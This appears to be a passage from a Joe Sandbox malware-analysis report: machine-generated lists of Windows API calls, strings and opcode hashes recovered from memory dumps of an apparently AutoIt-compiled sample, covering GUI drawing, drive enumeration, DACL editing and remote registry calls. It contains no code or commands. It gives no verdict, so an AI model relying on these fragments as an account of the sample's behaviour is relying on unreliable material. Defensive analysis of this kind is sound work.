                                                                • GlobalFree.KERNEL32(00000000), ref: 00792DB3
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792DC5
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,007AFC38,00000000), ref: 00792DDB
                                                                • GlobalFree.KERNEL32(00000000), ref: 00792DEB
                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00792E11
                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00792E30
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792E52
                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0079303F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                • API String ID: 2211948467-2373415609
                                                                • Opcode ID: 02befa9a0c82a01c9c0a75fd745a77be05bf0973dfb9a4d6ba6e3945aba49f63
                                                                • Instruction ID: c1038f47d585b850984fe188bf91fe37d0f53c34bd38ea7eb998faeea107e17e
                                                                • Opcode Fuzzy Hash: 02befa9a0c82a01c9c0a75fd745a77be05bf0973dfb9a4d6ba6e3945aba49f63
                                                                • Instruction Fuzzy Hash: D5027E71600204FFDB15DF64DC89EAE7BB9FB49310F008158F915AB2A1DB38AD01CB64
                                                                APIs
                                                                • SetTextColor.GDI32(?,00000000), ref: 007A712F
                                                                • GetSysColorBrush.USER32(0000000F), ref: 007A7160
                                                                • GetSysColor.USER32(0000000F), ref: 007A716C
                                                                • SetBkColor.GDI32(?,000000FF), ref: 007A7186
                                                                • SelectObject.GDI32(?,?), ref: 007A7195
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007A71C0
                                                                • GetSysColor.USER32(00000010), ref: 007A71C8
                                                                • CreateSolidBrush.GDI32(00000000), ref: 007A71CF
                                                                • FrameRect.USER32(?,?,00000000), ref: 007A71DE
                                                                • DeleteObject.GDI32(00000000), ref: 007A71E5
                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007A7230
                                                                • FillRect.USER32(?,?,?), ref: 007A7262
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A7284
                                                                  • Part of subcall function 007A73E8: GetSysColor.USER32(00000012), ref: 007A7421
                                                                  • Part of subcall function 007A73E8: SetTextColor.GDI32(?,?), ref: 007A7425
                                                                  • Part of subcall function 007A73E8: GetSysColorBrush.USER32(0000000F), ref: 007A743B
                                                                  • Part of subcall function 007A73E8: GetSysColor.USER32(0000000F), ref: 007A7446
                                                                  • Part of subcall function 007A73E8: GetSysColor.USER32(00000011), ref: 007A7463
                                                                  • Part of subcall function 007A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007A7471
                                                                  • Part of subcall function 007A73E8: SelectObject.GDI32(?,00000000), ref: 007A7482
                                                                  • Part of subcall function 007A73E8: SetBkColor.GDI32(?,00000000), ref: 007A748B
                                                                  • Part of subcall function 007A73E8: SelectObject.GDI32(?,?), ref: 007A7498
                                                                  • Part of subcall function 007A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007A74B7
                                                                  • Part of subcall function 007A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007A74CE
                                                                  • Part of subcall function 007A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007A74DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                • String ID:
                                                                • API String ID: 4124339563-0
                                                                • Opcode ID: a395ff104cee64a49d269181b177a392ae31cbda0c44f6069866f51614a85bd7
                                                                • Instruction ID: c1d833a297b8b297f6d1daa8806396e47f3a606c5ba0eede3470e098bae3167b
                                                                • Opcode Fuzzy Hash: a395ff104cee64a49d269181b177a392ae31cbda0c44f6069866f51614a85bd7
                                                                • Instruction Fuzzy Hash: 52A19C72508305BFDB069F60DC48A6BBBE9FBCA320F104B19F962961E1D738E944CB51
                                                                APIs
                                                                • DestroyWindow.USER32(?,?), ref: 00728E14
                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00766AC5
                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00766AFE
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00766F43
                                                                  • Part of subcall function 00728F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00728BE8,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728FC5
                                                                • SendMessageW.USER32(?,00001053), ref: 00766F7F
                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00766F96
                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00766FAC
                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00766FB7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                • String ID: 0
                                                                • API String ID: 2760611726-4108050209
                                                                • Opcode ID: 5cf960e0bc177573c301937f2194a77b082775510c01acbf8398033157868eec
                                                                • Instruction ID: b391f4e94040ef4cd4d46059eb55ea3ffd03a5bcf3b3695a5811d5d342211faa
                                                                • Opcode Fuzzy Hash: 5cf960e0bc177573c301937f2194a77b082775510c01acbf8398033157868eec
                                                                • Instruction Fuzzy Hash: A912C330602251EFDB25CF24D884BA5B7E5FB49300F958469F896CB262CB3AEC51CF55
                                                                APIs
                                                                • DestroyWindow.USER32(00000000), ref: 0079273E
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0079286A
                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007928A9
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007928B9
                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00792900
                                                                • GetClientRect.USER32(00000000,?), ref: 0079290C
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00792955
                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00792964
                                                                • GetStockObject.GDI32(00000011), ref: 00792974
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00792978
                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00792988
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00792991
                                                                • DeleteDC.GDI32(00000000), ref: 0079299A
                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007929C6
                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 007929DD
                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00792A1D
                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00792A31
                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00792A42
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00792A77
                                                                • GetStockObject.GDI32(00000011), ref: 00792A82
                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00792A8D
                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00792A97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                • API String ID: 2910397461-517079104
                                                                • Opcode ID: ef465bcdc2fd621a0ebc047f127f0758a802ec6c6c2009459480ba0329bfecfc
                                                                • Instruction ID: 3c85a15974266b009cbf1326dfd01d56ec5e317e21ff6ab51d09c1c6584c2c20
                                                                • Opcode Fuzzy Hash: ef465bcdc2fd621a0ebc047f127f0758a802ec6c6c2009459480ba0329bfecfc
                                                                • Instruction Fuzzy Hash: C7B14EB1A00215BFDB14DFA8DC8AEAE7BB9EB49710F008114F915EB291D778AD41CB94
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 00784AED
                                                                • GetDriveTypeW.KERNEL32(?,007ACB68,?,\\.\,007ACC08), ref: 00784BCA
                                                                • SetErrorMode.KERNEL32(00000000,007ACB68,?,\\.\,007ACC08), ref: 00784D36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DriveType
                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                • API String ID: 2907320926-4222207086
                                                                • Opcode ID: 3d07c6e4521c5a71e2e408a38c09d184ea8447bb67a4cf6bfa1cfafea795d1be
                                                                • Instruction ID: cc126940e35461b3c12a4c137c417d5931f29c2df85563d7bbc1eb128b2cf26c
                                                                • Opcode Fuzzy Hash: 3d07c6e4521c5a71e2e408a38c09d184ea8447bb67a4cf6bfa1cfafea795d1be
                                                                • Instruction Fuzzy Hash: 7361B370785107EBCB14FF28CA959A8B7F5AB44340B248016F806AB791DBFDED41DB61
                                                                APIs
                                                                • GetSysColor.USER32(00000012), ref: 007A7421
                                                                • SetTextColor.GDI32(?,?), ref: 007A7425
                                                                • GetSysColorBrush.USER32(0000000F), ref: 007A743B
                                                                • GetSysColor.USER32(0000000F), ref: 007A7446
                                                                • CreateSolidBrush.GDI32(?), ref: 007A744B
                                                                • GetSysColor.USER32(00000011), ref: 007A7463
                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007A7471
                                                                • SelectObject.GDI32(?,00000000), ref: 007A7482
                                                                • SetBkColor.GDI32(?,00000000), ref: 007A748B
                                                                • SelectObject.GDI32(?,?), ref: 007A7498
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007A74B7
                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007A74CE
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007A74DB
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A752A
                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007A7554
                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007A7572
                                                                • DrawFocusRect.USER32(?,?), ref: 007A757D
                                                                • GetSysColor.USER32(00000011), ref: 007A758E
                                                                • SetTextColor.GDI32(?,00000000), ref: 007A7596
                                                                • DrawTextW.USER32(?,007A70F5,000000FF,?,00000000), ref: 007A75A8
                                                                • SelectObject.GDI32(?,?), ref: 007A75BF
                                                                • DeleteObject.GDI32(?), ref: 007A75CA
                                                                • SelectObject.GDI32(?,?), ref: 007A75D0
                                                                • DeleteObject.GDI32(?), ref: 007A75D5
                                                                • SetTextColor.GDI32(?,?), ref: 007A75DB
                                                                • SetBkColor.GDI32(?,?), ref: 007A75E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 1996641542-0
                                                                • Opcode ID: 0ff49952e428e7f6b211fe5938957cf3a1275eb9b3d416ddff8a45f7fd7c9978
                                                                • Instruction ID: d9068959950ecebb2df0f9b7249635de96628bbe75cd9bfcd5189e73a71b16d4
                                                                • Opcode Fuzzy Hash: 0ff49952e428e7f6b211fe5938957cf3a1275eb9b3d416ddff8a45f7fd7c9978
                                                                • Instruction Fuzzy Hash: 26616272D00218BFDF059FA4DC49A9E7FB9EB4A320F118125F911A72A1D7789940CB94
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 007A1128
                                                                • GetDesktopWindow.USER32 ref: 007A113D
                                                                • GetWindowRect.USER32(00000000), ref: 007A1144
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A1199
                                                                • DestroyWindow.USER32(?), ref: 007A11B9
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007A11ED
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A120B
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007A121D
                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 007A1232
                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 007A1245
                                                                • IsWindowVisible.USER32(00000000), ref: 007A12A1
                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007A12BC
                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007A12D0
                                                                • GetWindowRect.USER32(00000000,?), ref: 007A12E8
                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007A130E
                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007A1328
                                                                • CopyRect.USER32(?,?), ref: 007A133F
                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 007A13AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                • String ID: ($0$tooltips_class32
                                                                • API String ID: 698492251-4156429822
                                                                • Opcode ID: 6d652756a919b59a4110630ce22425126f06b37f57d111bceccfbb35d96202f2
                                                                • Instruction ID: 782dc17fbec0acaf029921461ac602e0b5be55932ca5b835e16f62a83bda18f0
                                                                • Opcode Fuzzy Hash: 6d652756a919b59a4110630ce22425126f06b37f57d111bceccfbb35d96202f2
                                                                • Instruction Fuzzy Hash: F7B1A071604340EFE714DF64C888B6BBBE4FF89350F408A18F9999B2A1D735D845CB96
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 007A02E5
                                                                • _wcslen.LIBCMT ref: 007A031F
                                                                • _wcslen.LIBCMT ref: 007A0389
                                                                • _wcslen.LIBCMT ref: 007A03F1
                                                                • _wcslen.LIBCMT ref: 007A0475
                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007A04C5
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A0504
                                                                  • Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD
                                                                  • Part of subcall function 0077223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00772258
                                                                  • Part of subcall function 0077223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0077228A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                • API String ID: 1103490817-719923060
                                                                • Opcode ID: c320ffafea1640fa0198e8688e232dfee5964d24892d59640537857e86f4db9b
                                                                • Instruction ID: 482166180623ad31bfec196c76fa424adfe36d8a51dbb082ff732900b89e8576
                                                                • Opcode Fuzzy Hash: c320ffafea1640fa0198e8688e232dfee5964d24892d59640537857e86f4db9b
                                                                • Instruction Fuzzy Hash: 54E1C231208201DFCB18DF28C45596AB3E6BFCA314F544A6DF8969B3A1DB38ED45CB91
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00728968
                                                                • GetSystemMetrics.USER32(00000007), ref: 00728970
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072899B
                                                                • GetSystemMetrics.USER32(00000008), ref: 007289A3
                                                                • GetSystemMetrics.USER32(00000004), ref: 007289C8
                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007289E5
                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007289F5
                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00728A28
                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00728A3C
                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00728A5A
                                                                • GetStockObject.GDI32(00000011), ref: 00728A76
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00728A81
                                                                  • Part of subcall function 0072912D: GetCursorPos.USER32(?), ref: 00729141
                                                                  • Part of subcall function 0072912D: ScreenToClient.USER32(00000000,?), ref: 0072915E
                                                                  • Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000001), ref: 00729183
                                                                  • Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000002), ref: 0072919D
                                                                • SetTimer.USER32(00000000,00000000,00000028,007290FC), ref: 00728AA8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                • String ID: AutoIt v3 GUI
                                                                • API String ID: 1458621304-248962490
                                                                • Opcode ID: 89d7d0c439e4ca71de77e43e8aa67e56dcf13b45239ce88f1f5c99c708b51046
                                                                • Instruction ID: 0dd3d6f3f47ba72a18efbe996c5f4f997bb4bdaaaffd93b17bc9b4f36e94b4e1
                                                                • Opcode Fuzzy Hash: 89d7d0c439e4ca71de77e43e8aa67e56dcf13b45239ce88f1f5c99c708b51046
                                                                • Instruction Fuzzy Hash: 7DB1A071A01259EFDB14DF68DC85BAE3BB5FB48314F518129FA05AB290DB38E840CF55
                                                                APIs
                                                                  • Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
                                                                  • Part of subcall function 007710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
                                                                  • Part of subcall function 007710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
                                                                  • Part of subcall function 007710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
                                                                  • Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00770DF5
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00770E29
                                                                • GetLengthSid.ADVAPI32(?), ref: 00770E40
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00770E7A
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00770E96
                                                                • GetLengthSid.ADVAPI32(?), ref: 00770EAD
                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00770EB5
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00770EBC
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00770EDD
                                                                • CopySid.ADVAPI32(00000000), ref: 00770EE4
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00770F13
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00770F35
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00770F47
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F6E
                                                                • HeapFree.KERNEL32(00000000), ref: 00770F75
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F7E
                                                                • HeapFree.KERNEL32(00000000), ref: 00770F85
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F8E
                                                                • HeapFree.KERNEL32(00000000), ref: 00770F95
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00770FA1
                                                                • HeapFree.KERNEL32(00000000), ref: 00770FA8
                                                                  • Part of subcall function 00771193: GetProcessHeap.KERNEL32(00000008,00770BB1,?,00000000,?,00770BB1,?), ref: 007711A1
                                                                  • Part of subcall function 00771193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00770BB1,?), ref: 007711A8
                                                                  • Part of subcall function 00771193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00770BB1,?), ref: 007711B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                • String ID:
                                                                • API String ID: 4175595110-0
                                                                • Opcode ID: 5cec4432f3190834fb43302b69ad515fa6b80d0944febbd8eed5dc3f7cee670d
                                                                • Instruction ID: 2645551991a30bcc0b5cded3c28126c47a0d355c033c54bc94b51c5c03b3310c
                                                                • Opcode Fuzzy Hash: 5cec4432f3190834fb43302b69ad515fa6b80d0944febbd8eed5dc3f7cee670d
                                                                • Instruction Fuzzy Hash: 39715C72A0020AFBDF21DFA4DC49BAEBBB8BF45340F048115F919A6191D7799A05CFA0
                                                                APIs
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079C4BD
                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,007ACC08,00000000,?,00000000,?,?), ref: 0079C544
